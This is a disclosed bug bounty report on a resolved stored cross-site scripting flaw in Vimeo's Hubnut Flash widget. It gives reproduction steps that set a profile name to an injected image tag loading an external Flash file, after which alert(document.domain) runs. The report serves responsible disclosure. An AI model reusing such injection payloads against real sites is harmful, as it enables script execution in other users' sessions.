Stored XSS on vimeo.com and player.vimeo.com

Disclosed: 2015-11-30 14:17:08 By stefanovettorazzi To vimeo
Unknown
Vulnerability Details
__Description__ You can share your uploaded videos using the widget Hubnut. The URL is something like https://player.vimeo.com/hubnut/user/user36690798/uploaded_videos?color=44bbff&background=000000&slideshow=0&video_title=1&video_byline=1, and I noticed that the same content is loaded for this URL https://vimeo.com/hubnut/user/user36690798/uploaded_videos?color=44bbff&background=000000&slideshow=0&video_title=1&video_byline=1. The problem is that the Flash file that shows the files uploaded by an user (https://f.vimeocdn.com/p/flash/hubnut/2.0.11/hubnut.swf) renders the Name of the owner of the video without escaping it. This allows to load an external Flash file using the `<img>` tag. __Proof of concept__ 1. Go to https://vimeo.com/settings. 2. Change your _Name_ to `<img src="//u00f1.xyz/xss.swf">`. 3. Click on _Save Changes_. 4. Go to https://vimeo.com/settings/profile. 5. Save, for future use, the editable value of the field _Vimeo URL_ (probably is like *user36690798*). 6. Go to https://player.vimeo.com/hubnut/user/[value_from_step_5] (like: https://player.vimeo.com/hubnut/user/user36690798). 7. `alert(document.domain)` is executed. 8. Go to https://vimeo.com/hubnut/user/[value_from_step_5] (like: https://vimeo.com/hubnut/user/user36690798). 9. `alert(document.domain)` is executed. Please, let me know if something is not clear.
Actions
View on HackerOne
Report Stats
  • Report ID: 87577
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report